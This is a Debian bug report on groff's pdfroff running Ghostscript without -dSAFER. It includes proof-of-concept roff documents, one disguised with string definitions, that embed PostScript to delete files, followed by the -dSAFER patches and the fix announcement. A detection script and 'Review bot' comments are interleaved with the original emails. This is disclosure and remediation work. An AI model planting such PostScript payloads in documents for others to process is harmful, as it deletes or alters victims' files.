Acknowledgement sent
to "brian m. carlson" <sandals@crustytoothpaste.ath.cx>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Colin Watson <cjwatson@debian.org>.
(Fri, 24 Jul 2009 22:21:04 GMT)
Package: groff
Version: 1.20.1-4
Severity: grave
File: /usr/bin/pdfroff
Tags: security
pdfroff invokes gs without -dSAFER, leading to the ability to write,
rename, and delete arbitrary files:
lakeview ok % cat attack.roff
I am an evil attacking document. Boo!
\X'ps: exec (/tmp/remove-me) deletefile'
lakeview ok % touch /tmp/remove-me && pdfroff attack.roff >/dev/null && [ ! -f "/tmp/remove-me" ] && echo removed
GPL Ghostscript SVN PRE-RELEASE 8.64: Unrecoverable error, exit code 1
removed
Using ps2pdf may be a better solution, since it uses -dSAFER
automatically.
Obviously, this is a fairly straightforward example, but in a document
the size of groff's -me manual, this could easily be hidden. Disguising
it is easy, such as in:
lakeview ok % cat attack.roff
I am an evil attacking document. Boo!
.ds df deletefile
.ds fn /tmp/remove-me
\X'ps: exec (\*(fn) \*(df'
Processing or viewing a document from an unknown source shouldn't by
default cause code from that document to be executed, in general.
-- System Information:
Debian Release: squeeze/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/zsh4
Versions of packages groff depends on:
ii groff-base 1.20.1-4 GNU troff text-formatting system (
ii libc6 2.9-21 GNU C Library: Shared libraries
ii libgcc1 1:4.4.1-1 GCC support library
ii libice6 2:1.0.5-1 X11 Inter-Client Exchange library
ii libsm6 2:1.1.0-2 X11 Session Management library
ii libstdc++6 4.4.1-1 The GNU Standard C++ Library v3
ii libx11-6 2:1.2.2-1 X11 client-side library
ii libxaw7 2:1.0.5-2 X11 Athena Widget library
ii libxmu6 2:1.0.4-1 X11 miscellaneous utility library
ii libxt6 1:1.0.5-3 X11 toolkit intrinsics library
Versions of packages groff recommends:
ii ghostscript 8.64~dfsg-13 The GPL Ghostscript PostScript/PDF
ii imagemagick 7:6.5.1.0-1.1 image manipulation programs
ii libpaper1 1.1.23+nmu1 library for handling paper charact
ii netpbm 2:10.0-12 Graphics conversion tools
ii psutils 1.17-26 A collection of PostScript documen
groff suggests no packages.
-- no debconf information
--
brian m. carlson / brian with sandals: Houston, Texas, US
+1 713 440 7475 | http://crustytoothpaste.ath.cx/~bmc | My opinion only
OpenPGP: RSA v4 4096b 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
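The two documents above show the problem from the input side: whatever follows \X'ps: exec ...' is copied by groff into its PostScript output and then run by gs, and splitting the payload across .ds string definitions hides it from a naive grep. As an added example (not code from the report, from groff or from the Debian package), here is a small scanner a practitioner could run over untrusted roff input before it reaches pdfroff. It expands .ds definitions before inspecting \X'ps: ...' bodies and the equivalent .device request, which is what catches the disguised variant, and flags the PostScript operators that -dSAFER exists to neutralise. The three sample documents are constructed inline (the first two retyped from the report); the operator list, the limitation to the ' delimiter and the expansion bound are this example's own choices.

```python
r"""Static scanner for troff input that smuggles PostScript to Ghostscript.

groff copies the body of \X'ps: exec ...' (and of the equivalent .device
request) into its PostScript output verbatim, so whatever follows "exec"
is interpreted by gs.  The scanner expands .ds string definitions before
looking at the payload, which is what defeats the split-up variant from
the report.  Added example; not part of groff or of the bug report.
"""
import re

# Constructed samples.  The first two are the two documents from the report
# (retyped here); the third is a harmless control that mentions the
# operator name only as ordinary text.
DIRECT = r"""I am an evil attacking document. Boo!
\X'ps: exec (/tmp/remove-me) deletefile'
"""

DISGUISED = r"""I am an evil attacking document. Boo!
.ds df deletefile
.ds fn /tmp/remove-me
\X'ps: exec (\*(fn) \*(df'
"""

BENIGN = r""".ds title A harmless document
\fB\*[title]\fP mentions deletefile only as a word, outside any \X escape.
"""

# PostScript operators that reach the filesystem or spawn processes; these
# are what gs -dSAFER restricts.  "%pipe%" is a device prefix rather than an
# operator, so it is checked as a substring of the payload instead.
DANGEROUS_OPS = {"deletefile", "renamefile", "file", "run"}

DS_RE = re.compile(r"^\.ds\s+(\S+)\s*(.*)$", re.MULTILINE)
# \*x (one-char name), \*(xx (two-char name), \*[name] (long name)
STRING_REF_RE = re.compile(r"\\\*(?:\[([^\]]*)\]|\((..)|(.))")
# \X'...' escape and the .device request; only the ' delimiter is handled
# (an assumption of this example: groff accepts other delimiters too).
X_ESCAPE_RE = re.compile(r"\\X'([^']*)'")
DEVICE_RE = re.compile(r"^\.device\s+(.*)$", re.MULTILINE)


def parse_strings(doc):
    """Collect .ds definitions.  A leading double quote is groff's way of
    protecting leading blanks and is not part of the value."""
    strings = {}
    for name, value in DS_RE.findall(doc):
        strings[name] = value[1:] if value.startswith('"') else value
    return strings


def expand(text, strings, rounds=8):
    """Substitute string references; undefined strings expand to nothing,
    as in groff.  Bounded so a self-referential definition cannot loop."""
    def sub(m):
        return strings.get(m.group(1) or m.group(2) or m.group(3), "")
    for _ in range(rounds):
        expanded = STRING_REF_RE.sub(sub, text)
        if expanded == text:
            break
        text = expanded
    return text


def ps_payloads(doc):
    """Return every device-control string addressed to grops ("ps:"),
    after string expansion."""
    strings = parse_strings(doc)
    bodies = X_ESCAPE_RE.findall(doc) + DEVICE_RE.findall(doc)
    out = []
    for body in bodies:
        body = expand(body, strings).strip()
        if body.startswith("ps:"):
            out.append(body)
    return out


def dangerous_ops(payload):
    """Operators in a ps: payload that a -dSAFER interpreter would refuse.
    Parenthesised string literals are blanked first so that a path such as
    (/tmp/file) is not mistaken for the file operator."""
    body = payload.split(":", 1)[1]
    tokens = set(re.sub(r"\([^)]*\)", " ", body).split())
    found = sorted(DANGEROUS_OPS & tokens)
    if "%pipe%" in body:
        found.append("%pipe%")
    return found


def scan(doc):
    """Return (expanded payload, [operators]) for each ps: payload that
    carries a filesystem or process operator."""
    findings = []
    for payload in ps_payloads(doc):
        ops = dangerous_ops(payload)
        if ops:
            findings.append((payload, ops))
    return findings


if __name__ == "__main__":
    for label, doc in (("direct", DIRECT), ("disguised", DISGUISED),
                       ("benign", BENIGN)):
        print(label, scan(doc))
```

Both samples from the report come back as the same expanded payload, `ps: exec (/tmp/remove-me) deletefile`, while the control document yields nothing. This is a complement to -dSAFER, not a substitute for it: the gs flag still matters because a custom post-processor command can be configured without it, and pattern matching on troff input is easily evaded by macro tricks the scanner does not model, but it gives a cheap, log-friendly signal when a document tries.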
On Sat, Jul 25, 2009 at 09:32:38AM +0100, Colin Watson wrote:
> groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
> do so here?
I'm applying this patch to the Debian package. Please consider it?
=== modified file 'contrib/pdfmark/pdfroff.sh'
--- contrib/pdfmark/pdfroff.sh 2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.sh 2009-08-15 07:57:43 +0000
@@ -600,7 +600,7 @@
$SAY >&2 $n "Writing PDF output ..$c"
if test -z "$PDFROFF_POSTPROCESSOR_COMMAND"
then
- PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE
+ PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE -dSAFER
-sDEVICE=pdfwrite -sOutputFile="${PDF_OUTPUT-"-"}
elif test -n "$PDF_OUTPUT"
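Review bot: -dSAFER is only added to the built-in default; the `if test -z "$PDFROFF_POSTPROCESSOR_COMMAND"` guard two lines above means that a user or wrapper script that sets PDFROFF_POSTPROCESSOR_COMMAND in the environment gets a gs invocation without it, and the fix is silently undone. Worth a comment at this point in the script, and a sentence in the manual, saying that a custom post-processor is expected to pass -dSAFER itself (or to be something like ps2pdf, which the report notes adds it automatically).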
Thanks,
--
Colin Watson [cjwatson@debian.org]
On Sat, Aug 15, 2009 at 08:59:08AM +0100, Colin Watson wrote:
> On Sat, Jul 25, 2009 at 09:32:38AM +0100, Colin Watson wrote:
> > groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
> > do so here?
>
> I'm applying this patch to the Debian package. Please consider it?
Or, in fact, this patch, which adjusts the documentation too.
=== modified file 'contrib/pdfmark/pdfroff.man'
--- contrib/pdfmark/pdfroff.man 2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.man 2009-08-15 08:00:24 +0000
@@ -521,7 +521,7 @@ defaults to
.IP
.I
.ad l
-.NH gs \-dBATCH \-dQUIET \-dNOPAUSE \-sDEVICE=pdfwrite \-sOutputFile=\-
+.NH gs \-dBATCH \-dQUIET \-dNOPAUSE \-dSAFER \-sDEVICE=pdfwrite \-sOutputFile=\-
.ad
.RE
.
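Review bot: the manual now shows -dSAFER in the default command but says nothing about why it is there, so a reader who copies this line into their own PDFROFF_POSTPROCESSOR_COMMAND may drop it as noise. Suggest a sentence after the example stating that -dSAFER is what stops PostScript embedded in the document through \X'ps: ...' from deleting, renaming or writing files, and that any replacement command must keep it.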
=== modified file 'contrib/pdfmark/pdfroff.sh'
--- contrib/pdfmark/pdfroff.sh 2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.sh 2009-08-15 07:57:43 +0000
@@ -600,7 +600,7 @@
$SAY >&2 $n "Writing PDF output ..$c"
if test -z "$PDFROFF_POSTPROCESSOR_COMMAND"
then
- PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE
+ PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE -dSAFER
-sDEVICE=pdfwrite -sOutputFile="${PDF_OUTPUT-"-"}
elif test -n "$PDF_OUTPUT"
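Review bot: the change ships without a regression check. The reporter's one-liner (`touch /tmp/remove-me && pdfroff attack.roff >/dev/null && [ ! -f "/tmp/remove-me" ] && echo removed`) turns into a usable test with the sense inverted: create the file, run the proof-of-concept document through pdfroff, and assert that the file still exists. Running it against both the direct and the .ds-disguised document from the report would also guard against a later refactor of this default command dropping the flag again.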
Thanks,
--
Colin Watson [cjwatson@debian.org]
Reply sent
to Colin Watson <cjwatson@debian.org>:
You have taken responsibility.
(Sat, 15 Aug 2009 10:30:09 GMT)
Notification sent
to "brian m. carlson" <sandals@crustytoothpaste.ath.cx>:
Bug acknowledged by developer.
(Sat, 15 Aug 2009 10:30:10 GMT)
Source: groff
Source-Version: 1.20.1-5
We believe that the bug you reported is fixed in the latest version of
groff, which is due to be installed in the Debian FTP archive:
groff-base_1.20.1-5_i386.deb
to pool/main/g/groff/groff-base_1.20.1-5_i386.deb
groff_1.20.1-5.diff.gz
to pool/main/g/groff/groff_1.20.1-5.diff.gz
groff_1.20.1-5.dsc
to pool/main/g/groff/groff_1.20.1-5.dsc
groff_1.20.1-5_i386.deb
to pool/main/g/groff/groff_1.20.1-5_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 538338@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Colin Watson <cjwatson@debian.org> (supplier of updated groff package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Sat, 15 Aug 2009 09:01:47 +0100
Source: groff
Binary: groff-base groff
Architecture: source i386
Version: 1.20.1-5
Distribution: unstable
Urgency: low
Maintainer: Colin Watson <cjwatson@debian.org>
Changed-By: Colin Watson <cjwatson@debian.org>
Description:
groff - GNU troff text-formatting system
groff-base - GNU troff text-formatting system (base system components)
Closes: 538330 538338 541019 541621
Changes:
groff (1.20.1-5) unstable; urgency=low
.
* Upgrade to debhelper v7. (There's still lots of complexity here, so no
dh(1).)
* Remove Fumitoshi UKAI from Uploaders, with thanks for his previous work.
Just shout if you want to be added back (closes: #541019).
* Unset IFS at nroff startup (closes: #541621).
* Patch from Openwall to fix temporary file handling vulnerabilities in
pdfroff (closes: #538330).
* Use -dSAFER when calling gs from pdfroff (thanks, brian m. carlson;
closes: #538338).
Checksums-Sha1:
07d34cdf3f9a41ac8f80e7b38861afd2a4332bc1 1258 groff_1.20.1-5.dsc
afc572adbb7f9c762c50048ad3eec5cd1952f3ef 41184 groff_1.20.1-5.diff.gz
89ee0590a202dca5c08415edafad39d7224a4375 1103698 groff-base_1.20.1-5_i386.deb
d0a0c97b9156d9be0ae0d19af004ecf08cd95601 3512134 groff_1.20.1-5_i386.deb
Checksums-Sha256:
6d7fe33055e63798e631cbb0208f57be1affd53616cd525644263c7bd0270a9d 1258 groff_1.20.1-5.dsc
ab37002d146cb29d907ad8097c2620e1e63c699aaed1f394bd032b7ab8625fa6 41184 groff_1.20.1-5.diff.gz
01003d22439094286fdcf1c5ef036ba2a825215ef816e9939a2f944aa9301c6e 1103698 groff-base_1.20.1-5_i386.deb
0b0b8fec29f42590ef2bb1f90e36fe1db18974152abe1f68824ac40ea5c254db 3512134 groff_1.20.1-5_i386.deb
Files:
db341bf62664c0afefd71016c9cc3888 1258 text important groff_1.20.1-5.dsc
3bfaace1000bf8687ec8d6c02c84b1e6 41184 text important groff_1.20.1-5.diff.gz
a93b5459d35d5bb1c522642a18bca234 1103698 text important groff-base_1.20.1-5_i386.deb
e4558537f026c6d0db872a5c8efa6a95 3512134 text optional groff_1.20.1-5_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Colin Watson <cjwatson@debian.org> -- Debian developer
iD8DBQFKhm6T9t0zAhD6TNERAmwQAJ4uNNVsSBiTzKXdhJ5OPU/LXbqSWwCbBbJn
XTXdB9uhIGw+9ivXuNSpnIA=
=fTmN
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Wed, 16 Sep 2009 07:34:45 GMT)
Debbugs is free software and licensed under the terms of the GNU General
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.